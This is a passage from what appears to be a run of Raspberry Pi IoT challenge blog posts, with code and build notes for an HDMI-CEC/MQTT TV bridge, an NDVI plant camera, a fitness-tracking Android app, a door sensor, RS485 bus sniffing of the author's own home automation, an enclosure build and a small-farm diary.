accordingly. Other than that, provisioning the Raspberry Pi using Chef was straightforward. libCEC comes with the tool cec-client. This basically gives you a terminal for CEC commands. When we execute cec-client you see it connecting to HDMI and collecting some information about other devices, then we can give it commands.
For example we ask it for all devices currently connected with the scan command:

thuis-server-tv# cec-client -d 16 -t r
log level set to 16
== using device type 'recording device'
CEC Parser created - libCEC version 3.0.1
no serial port given. trying autodetect:
 path: Raspberry Pi
 com port: RPI
opening a connection to the CEC adapter...
DEBUG: [ 94] Broadcast (F): osd name set to 'Broadcast'
DEBUG: [ 96] InitHostCEC - vchiq_initialise succeeded
DEBUG: [ 98] InitHostCEC - vchi_initialise succeeded
DEBUG: [ 99] InitHostCEC - vchi_connect succeeded
DEBUG: [ 100] logical address changed to Free use (e)
DEBUG: [ 102] Open - vc_cec initialised
DEBUG: [ 105] << Broadcast (F) -> TV (0): POLL
// Receiving information from the TV
// ...
// Request information about all connected devices
scan
requesting CEC bus information ...
DEBUG: [ 41440] << Recorder 1 (1) -> Playback 1 (4): POLL
DEBUG: [ 41472] >> POLL sent
DEBUG: [ 41473] Playback 1 (4): device status changed into 'present'
// ...
CEC bus information
===================
device #0: TV
 address: 0.0.0.0
 active source: no
 vendor: Sony
 osd string: TV
 CEC version: 1.4
 power status: on
 language: dut
device #1: Recorder 1
 address: 1.6.0.0
 active source: no
 vendor: Pulse Eight
 osd string: CECTester
 CEC version: 1.4
 power status: on
 language: eng
device #4: Playback 1
 address: 1.1.0.0
 active source: yes
 vendor: Unknown
 osd string: Apple TV
 CEC version: 1.4
 power status: on
 language: ???
device #5: Audio
 address: 1.0.0.0
 active source: no
 vendor: Denon
 osd string: AVR-X2000
 CEC version: 1.4
 power status: on
 language: ???
currently active source: Playback 1 (4)

// indicates a comment added by me, // ... indicates output that was hidden as it's not needed for understanding

As you can see currently 4 devices are connected to the bus, including the Raspberry Pi itself (device #1). The Apple TV is the currently active source. You can tell cec-client which output it should give with the -d parameter.
We'll use this for our integration by choosing -d 8, which just displays the traffic on the bus. To integrate libCEC (or more specifically cec-client) with Java we have to write a wrapper around it. We'll do that in a similar way as MQTT-CDI, so the Java code can observe events happening on the CEC bus via a CDI observer. I wrote the initial version about a year ago and the full source code is available on my GitHub as Edubits/cec-cdi. It does not support the full CEC protocol yet, but most of the usual commands are available. For example you're able to turn your devices on and off, and send UI commands like play, pause, volume up, etc. You can of course also monitor these same functions, so the app will for example know when you turn off the TV manually. You can add CEC-CDI to your own project by adding the following dependency to your pom.xml:

<dependency>
    <groupId>nl.edubits.cec</groupId>
    <artifactId>cec-cdi</artifactId>
    <version>1.0-SNAPSHOT</version>
</dependency>

Monitoring what happens in the home theatre system can be done using CDI observers. Currently you can just add a qualifier for the source device, later I might also add some more sophisticated qualifiers such as the type of a command. When you're interested in all messages sent from the TV you can observe them like this:

@ApplicationScoped
public class CecObserverBean {
    public void tvMessage(@Observes @CecSource(TV) Message message) {
        logger.info("Message received from TV: " + message);
    }
}

To turn the TV on you can send it the IMAGE_VIEW_ON message without any arguments, for putting it in standby you use the STANDBY command.
In Java this looks as follows:

public class SendExample {
    @Inject
    private CecConnection connection;

    public void send() {
        // Send message from RECORDER1 (by default the device running this code) to the TV to turn on
        connection.sendMessage(new Message(RECORDER1, TV, IMAGE_VIEW_ON, Collections.emptyList(), ""));

        // Send message from RECORDER1 (by default the device running this code) to the TV to turn off
        connection.sendMessage(new Message(RECORDER1, TV, STANDBY, Collections.emptyList(), ""));
    }
}

Just like the Core application described in [Pi IoT] Thuis #8: Core v2: A Java EE application, this will be a Java EE application running on WildFly. It includes CEC-CDI. The application itself is quite simple, as its only function is bridging between CEC and MQTT. So we have two @ApplicationScoped beans observing events. The CecObserverBean forwards specific messages from the CEC bus to MQTT. In the example it monitors the power state of the television. Note that my Sony television has its own dialect as well: depending on how the TV is turned off, it reports the official STANDBY command or gives a vendor-specific command. When turning on it's supposed to report a certain command as well, but the Sony decides to skip it. That's why - as a workaround - I listen to REPORT_PHYSICAL_ADDRESS, which is a command it always gives during power on.
package nl.edubits.thuis.server.tv.cec;

@Startup
@ApplicationScoped
public class CecObserverBean {
    @Inject
    MqttService mqttService;

    public void tvMessage(@Observes @CecSource(TV) Message message) {
        if (message.getDestination() != BROADCAST && message.getDestination() != RECORDER1) {
            return;
        }

        switch (message.getOperator()) {
            case STANDBY:
                mqttService.publishMessage("Thuis/device/living/homeTheater/tv", "off");
                break;
            case REPORT_PHYSICAL_ADDRESS:
                mqttService.publishMessage("Thuis/device/living/homeTheater/tv", "on");
                break;
            case VENDOR_COMMAND_WITH_ID:
                if (message.getRawMessage().equals("0f:a0:08:00:46:00:09:00:01")
                        || message.getRawMessage().equals("0f:87:08:00:46")) {
                    mqttService.publishMessage("Thuis/device/living/homeTheater/tv", "off");
                }
                break;
            default:
                break;
        }
    }
}

The opposite happens in the MqttObserverBean, which listens to MQTT messages and executes the corresponding CEC commands. Here we'll turn the TV on and off and then ask the TV to report its power status back:

package nl.edubits.thuis.server.tv.mqtt;

@ApplicationScoped
public class MqttObserverBean {
    @Inject
    private CecConnection connection;

    public void onActionMessageTV(@Observes @MqttTopic("Thuis/device/living/homeTheater/tv/set") MqttMessage message) {
        switch (message.asText()) {
            case "on":
                connection.sendMessage(new Message(RECORDER1, TV, IMAGE_VIEW_ON, Collections.emptyList(), ""));
                break;
            case "off":
                connection.sendMessage(new Message(RECORDER1, TV, STANDBY, Collections.emptyList(), ""));
                break;
        }
        connection.sendMessage(new Message(RECORDER1, TV, REPORT_POWER_STATUS, Collections.emptyList(), ""));
    }
}

This concludes our implementation of the TV node. It's now able to listen to other CEC-enabled devices, communicate with them and bridge this through MQTT messages. In part 2 we'll take these MQTT messages, wrap them and create some scenes to turn everything on with a single button!

After quite a bit of hard work during the last days, the project reached its end.
Of course many improvements can be made, and other features can be added, but that is for later, after the challenge. I had the plan to add humidity, pressure and temperature measurements with the SenseHat, but unfortunately the SenseHat, Wi-Pi and PiFace Digital were missing from my kit. In this post I will briefly explain the ndvicam.py python code which does most of the work. I will finish with a number of example images.

[Pi IoT] Plant Health Camera #10 - connecting the Master and Slave Pi

Below is the source code of ndvicam.py. I added comments for each step so the code is self-explaining. After some initializations an endless loop is started with while True: in which first a live image is shown until a key is pressed. There are five options: After pressing q the program terminates; after pressing any other key, an image is captured from the camera and a trigger is sent to the slave so that it also captures an image, see [Pi IoT] Plant Health Camera #7 - Synchronizing the cameras for details. Then this image is loaded from the share which was mounted from the slave pi (details can be found in [Pi IoT] Plant Health Camera #6 - Putting the slave Pi to work). Then the images of the two cameras are aligned, as described in [Pi IoT] Plant Health Camera #8 - Aligning the images. I tested the options TRANSLATION, AFFINE and HOMOGRAPHY, by commenting out the specific setting. After the images are aligned, the NDVI, GNDVI and BNDVI are calculated, and depending on which key was pressed, one of them is displayed. After a key is pressed, or after ten seconds, all images (noir, color, ndvi, gndvi and bndvi) are saved, with a timestamp in the filename.
# import the necessary packages
from picamera.array import PiRGBArray
from picamera import PiCamera
import RPi.GPIO as GPIO
import time
import numpy
import readchar
import datetime
import cv2

# initialize the camera and grab a reference to the raw camera capture
camera = PiCamera()
camera.ISO = 100
camera.resolution = (800, 480)
rawCapture = PiRGBArray(camera)

# Define the motion model
warp_mode = cv2.MOTION_TRANSLATION
#warp_mode = cv2.MOTION_AFFINE
#warp_mode = cv2.MOTION_HOMOGRAPHY

# Define 2x3 or 3x3 matrices and initialize the matrix to identity
if warp_mode == cv2.MOTION_HOMOGRAPHY :
    warp_matrix = numpy.eye(3, 3, dtype=numpy.float32)
else :
    warp_matrix = numpy.eye(2, 3, dtype=numpy.float32)

# Termination criteria for the ECC algorithm
# (assumed values: at most 50 iterations, epsilon 0.001)
criteria = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 50, 0.001)

# allow the camera to warmup
time.sleep(0.1)

# GPIO Setup
GPIO.setmode(GPIO.BCM)
GPIO.setup(18, GPIO.OUT)
GPIO.output(18, 0)

while True:
    print("Usage:")
    print(" q: Quit")
    print(" c: Show Color Image")
    print(" o: Show NoIR Image")
    print(" n: Show NDVI Image")
    print(" g: Show GNDVI Image")
    print(" b: Show BNDVI Image")
    camera.start_preview()
    c = readchar.readchar()
    camera.stop_preview()
    if c=='q':
        print('quit ndvicam.py')
        break

    # grab an image from the camera
    camera.capture(rawCapture, format="bgr")
    noir_image = rawCapture.array

    # trigger camera on slave and load
    GPIO.output(18, 1)
    time.sleep(1)
    GPIO.output(18, 0)
    time.sleep(1)
    color_image = cv2.imread('pi1iot_share/slave_image.jpg',cv2.IMREAD_COLOR)

    # extract nir, red, green and blue channel
    nir_channel = noir_image[:,:,0]/256.0
    green_channel = noir_image[:,:,1]/256.0
    blue_channel = noir_image[:,:,2]/256.0
    red_channel = color_image[:,:,0]/256.0

    # align the images
    # Run the ECC algorithm. The results are stored in warp_matrix.
    # Find size of image1
    sz = color_image.shape

    (cc, warp_matrix) = cv2.findTransformECC(color_image[:,:,1], noir_image[:,:,1], warp_matrix, warp_mode, criteria)

    if warp_mode == cv2.MOTION_HOMOGRAPHY :
        # Use warpPerspective for Homography
        nir_aligned = cv2.warpPerspective(nir_channel, warp_matrix, (sz[1],sz[0]), flags=cv2.INTER_LINEAR + cv2.WARP_INVERSE_MAP)
    else :
        # Use warpAffine for Translation, Euclidean and Affine
        nir_aligned = cv2.warpAffine(nir_channel, warp_matrix, (sz[1],sz[0]), flags=cv2.INTER_LINEAR + cv2.WARP_INVERSE_MAP)

    # calculate ndvi
    ndvi_image = (nir_aligned - red_channel)/(nir_aligned + red_channel)
    ndvi_image = (ndvi_image+1)/2
    ndvi_image = cv2.convertScaleAbs(ndvi_image*255)
    ndvi_image = cv2.applyColorMap(ndvi_image, cv2.COLORMAP_JET)

    # calculate gndvi_image
    gndvi_image = (nir_channel - green_channel)/(nir_channel + green_channel)
    gndvi_image = (gndvi_image+1)/2
    gndvi_image = cv2.convertScaleAbs(gndvi_image*255)
    gndvi_image = cv2.applyColorMap(gndvi_image, cv2.COLORMAP_JET)

    # calculate bndvi_image
    bndvi_image = (nir_channel - blue_channel)/(nir_channel + blue_channel)
    bndvi_image = (bndvi_image+1)/2
    bndvi_image = cv2.convertScaleAbs(bndvi_image*255)
    bndvi_image = cv2.applyColorMap(bndvi_image, cv2.COLORMAP_JET)

    # display the image based on key pressed on screen
    if c == 'o':
        cv2.imshow("Image", noir_image)
    elif c == 'c':
        cv2.imshow("Image", color_image)
    elif c == 'n':
        cv2.imshow("Image", ndvi_image)
    elif c == 'b':
        cv2.imshow("Image", bndvi_image)
    elif c == 'g':
        cv2.imshow("Image", gndvi_image)

    # wait at most 10 seconds for a keypress
    cv2.waitKey(10000)

    # cleanup
    cv2.destroyAllWindows()
    rawCapture.truncate(0)

    # get current date and time to add to the filenames
    d = datetime.datetime.now()
    datestr = d.strftime("%Y%m%d%H%M%S")

    # save all images
    cv2.imwrite("./images/" + datestr + "_noir.jpg", noir_image)
    cv2.imwrite("./images/" + datestr + "_color.jpg", color_image)
    cv2.imwrite("./images/" + datestr + "_ndvi.jpg", ndvi_image)
    cv2.imwrite("./images/" + datestr + "_gndvi.jpg", gndvi_image)
    cv2.imwrite("./images/" + datestr + "_bndvi.jpg", bndvi_image)

The proof of the pudding is in the eating, so here are the images you have been waiting for. Here is a video of the setup. In front of the camera are a hydrangea plant and two roses. The color image. The NoIR image, which is the NoIR camera with the infra-blue filter attached. Note the different perspective at this small distance. The two images are aligned using the HOMOGRAPHY algorithm, which you can clearly see in the blue border below. A drawback of the HOMOGRAPHY is that it is quite time consuming. In this case, the ECC algorithm took almost 15 minutes. The NDVI image clearly shows healthy plant parts in red, while other stuff is in the blue-green range. Note that the roses look very unhealthy! This is true, because they are fake. The BNDVI and GNDVI don't look very promising; I will investigate this later. I also took my camera outside, powered by a USB power bank. With the following results: Here I used TRANSLATION for the alignment, which works pretty well for objects at larger distance from the camera. It also is much faster, less than 30 s computation time in this case. This finalizes more or less my project. I will try to make a summary blog on Monday, but yet I'm not sure I will have time for that. I hope you enjoyed my posts and it inspired you to use the Pi for agricultural applications and plant phenotyping. Feel free to comment or ask questions, I will try to answer them all.

Initial setup: Nexus 5 - Android 6.0.1

Full code in github - SmartApp

When launching, the user will be able to select one of our two activities: The GUI is constantly updated to show: Additionally, this information is stored in a local database in the phone.
PODIUM (Not enabled yet) > request other residents' information from the server and see the current state of the competition

To access GPS location we use the Android Location library (android.location). In more detail, the app uses these of its classes: The app needs to obtain the current location, compare it with the previous one and extract the distance. This distance will then be updated in the main GUI and included in the monthly and daily calculations. To count the steps we make use of the hardware Android library (we will use accelerometer data). CountSteps implements SensorEventListener, with the methods: As with any other step counter, if you shake the device the number of steps increases. We will need other methods to determine whether the person is really moving or not (aka GPS location). Please see the following video showing the first run of the application.

In this post I explained how to create an Android application to track the traveled distance. This is the main app of the competition system. It will: This update should help navigate through the next posts: it's been a long period without any news and I will be quite active for the next days... I hope the final result does not look very confusing ^^u

The innovation part of this project is the competition system: we want to engage the residents of the house in a competitive environment to promote a healthier way of life. It can later be expanded for more fun types of activities. For now, the only challenge presented to the roommates is the amount of km walked/run/biked during a month. This information will be gathered thanks to a mobile phone application and sent to the smart house central node. In the end, the smart house main GUI will show the regular smart house information plus the current status of the competition.
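The distance extraction mentioned above (compare each new GPS fix with the previous one) is typically done with the haversine formula. The app itself is Java/Android, but the math is language-agnostic; here is a sketch in Python (function name and radius constant are my own, not from the SmartApp code):

```python
import math

def haversine_m(lat1, lon1, lat2, lon2):
    """Great-circle distance in meters between two GPS fixes."""
    R = 6371000.0  # mean Earth radius in meters (assumed constant)
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dp = math.radians(lat2 - lat1)
    dl = math.radians(lon2 - lon1)
    a = math.sin(dp / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dl / 2) ** 2
    return 2 * R * math.asin(math.sqrt(a))

# One degree of latitude is roughly 111 km
print(round(haversine_m(0.0, 0.0, 1.0, 0.0) / 1000, 1))  # → 111.2
```

Summing these per-fix distances gives the daily and monthly totals shown in the GUI.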
The following image shows the basic structure of the system (with only one user included): NOTE: The house wifi router will be performing the corresponding port forwarding to the Central Node and its competition port.

Initial setup: Nexus 5 - Android 6.0.1

We will update the original User's node, so that it hosts: It will be divided in three main functions: I will be modifying the original application. It is a basic Android app that connects to the MQTT broker and displays the smart house values upon request. First, this app's functionalities will be included in the Smart Home Activity, to be enhanced later on with:

Initial setup: Raspberry Pi 3 - Raspbian OS (Jessie) / SSH Enabled / Mosquitto MQTT Broker installed / MQTT Subscriber client / Console interface / Python GTK interface / MySQL Server / Apache2 web Server

In the central node, I will have to implement the Competition Service. This service will manage the incoming packages from each roommate (containing the distance update) and update them in the MySQL database. The main Python scripts (managing the MQTT_client_subscriber and Main GUI) will include functions to read the competition values from the database and update the interface accordingly. The development of the competition system will require:

This post will cover the doors and windows notifier.

Previous posts:
Pi IoT - Simone - Introduction
Pi IoT - Simone - #1 - Light Controller
Pi IoT - Simone - #2 - Main System

For this part of the project I initially wanted to use the EnOcean Hall Sensor, since it seemed the easiest and most non-intrusive way to do it, but unfortunately the sensor is on a different frequency so it does not connect to the receiver. Instead I used the I2C connection protocol from the light controller for this. The system has three components: 1. The hall sensor with the ATTiny controller that feeds the data through I2C to the main system. 2. The main system that receives the data and calculates if the door is opened or closed 3.
A magnet that will be glued on the door.

1. The sensor component should be positioned on the door frame in such a way that it would be possible for the magnet on the door to get close to it when the door is closed. (You can place it inside the door frame if you carve a hole in it, and because it is a magnetic sensor you can actually cover it up afterwards so you do not see it.) I used for this an ATtiny 84 SSU, and as a hall sensor I used a Honeywell SS495A. This is not really a very exact sensor, but it serves its purpose for this project; it can actually distinguish tiny movements of the magnet that is close to it.

2. The controller for the sensor should only read the data and send it to the Main Server on the Raspberry Pi when it is requested. The calculation behind this is made by the Raspberry. To calibrate the system, a logic can be inserted into the application that would require you to close the door so it can record the value it receives when the magnet is positioned closest to the sensor. Then the application will take that value as the default closed value, and any other input will be considered opened.

3. The magnet should be positioned on the door so that when the door is closed the magnetic field reaches the hall sensor, sending data to the main system.

NOTE: As I said, initially I wanted to use the EnOcean sensor for this. As I described in the main system post, there can be more than one Raspberry Pi, and one could be used to make the connections to the EnOcean devices, then connect to the main system as a client and feed data to it. This would have solved some issues, and the biggest one is that no more wires would have been needed.
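The calibrate-then-compare logic described in point 2 can be sketched without any I2C hardware; only the threshold comparison matters. In the real system the reading arrives over I2C from the ATtiny; the ADC values and tolerance below are made-up stand-ins:

```python
# Sketch of the door open/closed decision on the Pi side. In the real
# system the reading comes over I2C from the ATtiny; here we model the
# calibration logic with made-up ADC values.

TOLERANCE = 10  # allowed ADC drift around the calibrated "closed" value (assumed)

def calibrate(samples):
    """Average several readings taken while the door is held closed."""
    return sum(samples) / float(len(samples))

def is_closed(reading, closed_value, tolerance=TOLERANCE):
    return abs(reading - closed_value) <= tolerance

closed_value = calibrate([512, 514, 511, 513])  # door closed during setup

print(is_closed(515, closed_value))  # magnet near the sensor → True
print(is_closed(300, closed_value))  # magnet moved away, door open → False
```

Averaging a handful of samples during calibration smooths out the SS495A's noise, which matters since it is not a very exact sensor.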
The code for the microcontroller:

//#define _DEBUG

#ifdef _DEBUG
#include <Wire.h>
#else
#include "TinyWireS.h"
#endif
#include "I2CTypes.h"

#define SLAVE_ADDRESS 0x10

const int analogInPin = A0;

static const String c_identification = "2#10#1#Usa Balcon#0";

int m_freeMemory = 0;
uint8_t m_i2cMessageData[32];
int m_i2cMessageDataLength;
int m_messageCounter;
uint8_t m_dataArray[32];

int freeRam() {
  extern int __heap_start, *__brkval;
  int v;
  return ((int)&v - (__brkval == 0 ? (int)&__heap_start : (int)__brkval)) / 4;
}

void setup() {
  pinMode(1, OUTPUT);

  // initialize i2c as slave and define callbacks for i2c communication
#ifdef _DEBUG
  Wire.begin(SLAVE_ADDRESS);
  Wire.onReceive(receiveData);
  Wire.onRequest(sendData);
#else
  TinyWireS.begin(SLAVE_ADDRESS);
  TinyWireS.onReceive(receiveData);
  TinyWireS.onRequest(sendData);
#endif

  m_i2cMessageDataLength = 0;
  m_i2cMessageData[0] = 0xFE;

#ifdef _DEBUG
  Serial.begin(9600);
#endif
}

void loop() {
#ifdef _DEBUG
  m_freeMemory = freeRam();
  Serial.println(analogRead(A0) * (5.0 / 1023.0));
  delay(1000);
  //Serial.print("Memory: ");
  //Serial.println(m_freeMemory);
#else
  TinyWireS_stop_check();
#endif
}

void sendData() {
  uint8_t byteToWrite = 0x05;
  byteToWrite = m_i2cMessageData[m_messageCounter];
  m_messageCounter++;
  if (m_messageCounter >= m_i2cMessageDataLength) {
    m_messageCounter = 0;
  }
#ifdef _DEBUG
  Wire.write(byteToWrite);
#else
  TinyWireS.send(byteToWrite);
#endif
}

// callback for received data
#ifdef _DEBUG
void receiveData(int byteCount) {
#else
void receiveData(uint8_t byteCount) {
#endif
  uint8_t index = 0;
#ifdef _DEBUG
  while (Wire.available()) {
    m_dataArray[index] = Wire.read();
    index++;
  }
#else
  while (TinyWireS.available()) {
    m_dataArray[index] = TinyWireS.receive();
    index++;
  }
#endif
  processMessage();
}

void processMessage() {
  m_i2cMessageData[1] = m_dataArray[0];
  switch (m_dataArray[0]) {
    case SW_Ping:
      m_i2cMessageDataLength = 4;
      m_i2cMessageData[2] = 0;
      m_messageCounter = 0;
      break;
    case SW_Identify:
      int length;
      length = c_identification.length();
      m_i2cMessageDataLength = 3 + length;
      for (int i = 0; i < length; i++) {
        m_i2cMessageData[2 + i] = c_identification[i];
      }
      m_messageCounter = 0;
      break;
    case SW_Restart:
      break;
    case SW_Get:
      int sensorValue;
      sensorValue = analogRead(analogInPin);
      m_i2cMessageDataLength = 3;
      m_i2cMessageData[2] = sensorValue;
      m_messageCounter = 0;
      break;
    default:
      m_i2cMessageDataLength = 4;
      m_i2cMessageData[2] = 0;
      m_messageCounter = 0;
      break;
  }
  m_i2cMessageData[m_i2cMessageDataLength - 1] = 0xFF;
}

Not all blog posts can be about successful implementations or achievements. Sometimes, failure happens as well. This is the case for my domotics implementation. Does that mean I have given up on getting it to work? Certainly not, but I'm stuck and don't have the luxury of time, so close to the deadline with plenty of other things left to do. Here's what I did manage to figure out so far ...

As you may or may not know, I moved house during the challenge, at the beginning of July. The new house has a domotics installation by Domestia, a Belgian domotics brand from what I could find. The installation consists of two relay modules, capable of turning lights and outlets on or off. There are also two dimmer modules for lights. When we started replacing the halogen bulbs with LED ones, we noticed the dimmers no longer worked, and had to replace the dimmers with LED-compatible ones. Next to the electrical wires, the modules have a three-way connector labeled A, B and GND. Searching the datasheets, it is explained that the domotics modules are connected to an RS485 bus for communication. The wiring is illustrated in the module's manual: The RS485 bus could be an entry point to reading the lights' or outlets' status, and eventually controlling them. Here's what it looks like in real life: The RS485 bus can be accessed via the dimmer's blue, green and orange wires, labeled A, B and GND.
According to this, the pins' functions are the following:

I started by first connecting my oscilloscope to the bus, verifying there is activity. Probe 1 was connected to line A, probe 2 to line B. This is what I saw:

Three things can be observed/confirmed at a glance:

Knowing there is data present, I could perhaps find a script or piece of software able to decode the data. For that purpose, I bought a generic RS485 to Serial USB module. Using a basic serial tool, I was able to dump the raw hexadecimal data. A new observation is that every new line starts with the hexadecimal value "0x0C". With a script I found and modified to suit my needs, I captured the raw data and jumped to a new line every time the "0x0C" value appeared.

#!/usr/bin/env python
# Original script from
# Modified to print full hex sequences per line instead of individual values

import serial
import binascii
import time

ser = serial.Serial()
data = ""

def initSerial():
    global ser
    ser.baudrate = 9600
    ser.port = '/dev/tty.usbserial-A50285BI'
    ser.stopbits = serial.STOPBITS_ONE
    ser.bytesize = 8
    ser.parity = serial.PARITY_NONE
    ser.rtscts = 0

def main():
    initSerial()
    global ser
    global data
    ser.open()
    while True:
        mHex = ser.read()
        if len(mHex) != 0:
            # a single byte hexlifies to "0c" only when it is the 0x0C delimiter,
            # in which case find() returns 0 and the accumulated line is flushed
            if not binascii.hexlify(bytearray(mHex)).find("0c"):
                print data
                data = binascii.hexlify(bytearray(mHex))
            else:
                data = data + " " + binascii.hexlify(bytearray(mHex))
        time.sleep(0.05)

if __name__ == "__main__":
    main()

Some of the captured sequences:

a 08 ff 08 fe 0c 08 08 08 08 08 08 08 08 08 08 18 08 a8 08 fe 08 ff 0c 08 08 08 08 08 08 08 08 08 08 18 08 a8 08 ff 08 fe 0c 08 08 08 08 08 08 08 08 08 08 18 08 a8 08 fe 85 ff 0c 08 08 08 08 0a 08 08 0a 08 08 18 08 a8 08 fe fe 08 ff 0c 08 08 08 08 08 08 08 08 08 08 18 08 a8 08 ff 85 ff 0c 0a 08 08 08 08 08 08 08 08 08 18 08 a8 08 ff 08 fe 0c 08 08 08 08 08 08 08 08 08 08 18 08 aa 08 fe 85 ff 22 20 0c 08 08 08 08 0a 08 08 08 18 08 a8 08 ff 84 ff 0c 08 0a 08 08 08 08 08 08 08 08 18 08 a8 08 ff 08 ff 0c 08 08 08 08 08
08 08 08 08 08 18 08 a8 08 ff 85 ff 22 20 0c fe 08 ff 0c 08 08 ff 85 ff 0c 08 08 08 08 08 08 08 08 08 08 18 0a a8 0a fe 08 ff 0c 08 08 08 08 08 08 08 08 08 08 18 08 a8 08 fe 08 ff 0c 08 08 08 08 08 08 08 08 08 08 18 08 a8 0a ff 08 fe 0c 08 08 08 08 08 08 08 08 08 08 1a 08 a8 08 ff 08 ff 0c 08 08 08 08 08 08 08 08 08 08 18 08 a8 08 ff 08 ff 0c 08 08 08 08 08 08 08 08 08 08 18 08 a8 08 ff 85 ff 0c 08 08 08 08 08 08 08 08 08 08 18 08 a8 08 fe 08 fe 0c 08 08 08 08 08 08 08 08 08 08 18 08 a8 08 ff 08 fe 0c 08 08 08 08 08 08 08 08 08 0a 18 08 a8 08 ff 08 ff 0c 08 08 08 08 08 08 08 08 08 08 18 08 a8 08 fe 08 ff 22 20 0c 08 08 08 08 08 08 08 08 18 08 a8 08 ff 08 ff 0c 08 08 08 08 08 0a 08 08 08 08 18 08 a8 08 fe 08 ff 0c 08 08 08 08 08 08 08 08 08 08 18 08 a8 08 ff 08 fe 22 20

There is a very repetitive pattern, with occasionally different values. But what does it do or mean? This is where I got blocked. This is a bit too low-level for me, so any help would be greatly appreciated! Before being able to go any further, I need to be able to make sense of the data. Until then, this feature will be parked. The goal is still to be able to control and monitor the domotics, but sadly it most likely won't be achieved in this challenge. Now, if you do have knowledge or know about tools which could help me further, feel free to leave a comment below.

No time to go out on a Friday night, only a couple of days before the challenge's deadline. Instead, I decided to annoy the neighbours by doing some final milling and sanding ... So, as promised, here's the enclosure for the second control unit. Unlike the alarm clock, this unit makes use of a touch screen and keypad for user input, on top of the voice commands. Because of these components, it is also quite a bit larger than the alarm clock. It will be sitting on the cabinet. Here's what I've done with it and how I got there ... This unit was too large to cut solely with the CNC.
The board to cut from was so large I couldn't clamp it normally and had to resort to alternative methods, demonstrated below. The CNC was used to mill the slots in the front and top panel, which is just about the maximum supported width of my CNC. To actually cut the different panels out of the board, I used the classic method: the table saw. Using the router, I manually made the grooves, trimmed the pieces to fit and rounded the edges. Using some wood glue and clamps, the pieces were attached to each other. This unit required a lot more manual work than the alarm clock, but was clearly faster for some actions, though not always as accurate as the CNC. I suppose accuracy in manual actions comes with experience.

Milling acrylic using the CNC required a few attempts before achieving clean results. During the initial runs, the mill's feed rate was too low, causing the acrylic to heat up too much, melt and stick to the milling bit. This, in turn, caused damage to the piece because of the molten blob swinging around. By increasing the feed rate to 1000 mm/min, with passes of 0.7 mm, the mill travelled fast enough to cut without melting, resulting in cleanly cut pieces, as demonstrated below.

To compensate for possible inconsistency issues due to the manual cutting and assembling of this enclosure, the side panels would have to be measured and drawn individually for milling. A much easier and faster approach was to glue a slightly larger, roughly cut piece of acrylic to the sides and use a flush trim router bit. The flush trim bit has a bearing which follows the shape of the wooden enclosure it is rolling on, while cutting the acrylic to the same shape. Before and after a manual flush trim: A bit of sanding will ensure everything is smooth and soft to the touch. So, after all the sanding, gluing, filling, milling, etc ... I showed it to the wife, and I was allowed to put it on the cabinet. Here's the result: It's a bit of a pity the touch screen's border is black.
I'm thinking I could get some white film to stick on the edges of the display, giving it a white border. By the way, I feel it looks like a microwave or retro TV. Can anyone confirm or deny this?

This Morning's Bounty of Fowl investments! The 3 on top are Duck eggs; only 1 was laid today, but I wanted to give a size comparison to the Chicken Eggs. The Element 14 pen is also for size comparison. But John, you don't have any Chickens laying yet, do you? There lies the story in regards to Yesterday...

Yesterday was an interesting day on the IoT Farm. The previous night, while I was working my swing shift, my better half shared that she had found a lady giving away 5 laying hens and a coop to go with them. But it sounded like there was so much interest in it that the outcome was uncertain. So I continued working on the Raspberry Pi B, using MotionEyeOs with the NoIR Camera and 2 new USB cameras that just came in. Everything connected fine up to the point of trying to go from hardwired to the WiPi USB adapter. So this had my attention, as I am continuing to try and troubleshoot since the WiPi is essential. Side note: there is a big difference in response between the RPi 3 and the RPi B running MotionEyeOs. Patience is a must using the B.

After 6 hours of sleep I was up and running again, getting Kiddos ready for school and planning my day for working on the Farm Operations Center assembly. I have been playing with just the basic setup of the 7" touchscreen with RPi 3 attached to the back, but want to come up with an actual container in case I want to move it about the Farm. So a F.O.C. Box is in the plans! This is what greeted my wife in the morning through the newly installed sliding Duck Door. She was very Happy! Easy Egg Extraction! Okay, 2 daughters safely at school courtesy of bus and one son delivered to his school, now time for working on the F.O.C. Box!
Walmart has all of their school supplies drastically reduced, and I had noticed my kids having some various sized plastic pencil boxes that looked intriguing. So $1.13 later I have a variety of sizes and colors to play with! Fun times await! 25 cents and 10 cents per box depending on size, very nice!

Meanwhile my wife had heard back from the lady with 5 laying hens. Yes, they are available for her if we can go pick everything up. So time to unload the Truck and make sure all straps and accessories are ready to go. It took a bit, but we caught all of the hens, loaded them into a Kennel/Carrier and also loaded the Chicken coop into the back of the Truck. She even threw in another female rabbit, with food for both rabbit and hens. Due to the size of the Coop the tailgate had to stay down and everything was strapped/secured quite tightly. It seems we were an interesting sight as we picked up our son at the school. It isn't every day someone pulls up with a Chicken Coop in the back of their truck, complete with live Chickens. Interestingly enough, our son was NOT surprised. :-) He just hopped in and started talking to the rabbit, who was in a little carrier by his seat. Doesn't every family collect farm animals like Old McDonald?

Arriving back at the IoT Farm, everyone was quite interested in our new additions. Even the G.O.A.Ts were interested in helping in their own special way. I even got some supplies to play with: she gave me 10 Chicken Nipples that I am going to use with PVC piping to run water to the animals! There you can see the F.O.C. in its base form, ready to be placed into a box. Here are the new Ladies being introduced to the full sized Chicken Casa. Here is the new Coop in place. A quick check of it, and we want to add some sturdier latches and start some serious weather proofing. And yes, another sliding door has now been added to the to-build list.
:-) While we headed out for my son's special tutoring that evening, a little rain storm rolled through. Here are the new Ladies checking everything out after the rain. By the time we managed to get all of the various animals locked down for the evening, I had a couple of inches of wet clay on my running shoes. Note to self: buy some waterproof mud boots for future weather conditions. We had been concerned that with the new move and new location the birds would all be quite upset and we may have some chaos for a bit on the IoT Farm, but as you can see from the egg picture they have all managed to settle in. Those 5 Ladies provided us 4 eggs and apparently challenged the other birds, since 1 of them laid our first chicken egg from our original chickens! Very cool! And here is a picture of our Vane Chicken roosting out on the fence as I finished up outside for the evening.

Schema heater.basic (generally sent to heater clients)
Message type: command
Message body: request=start|stop|restart|status

Schema heater.report (generally sent by clients when state or time changes)
Message type: trigger or status
Message body: heater=on|off remaining=#minutes

Each hangar device will periodically send a "heartbeat" to let other concerned listeners know that it is still available. When a heater needs to be turned on, a request is sent from HangarControl to a single hangar:

The xPL protocol has been codified and comes in at a paltry 796 lines of (mostly) readable Python! I have attached it for your perusal. While I don't imagine you want to read it all, some interesting points would be:

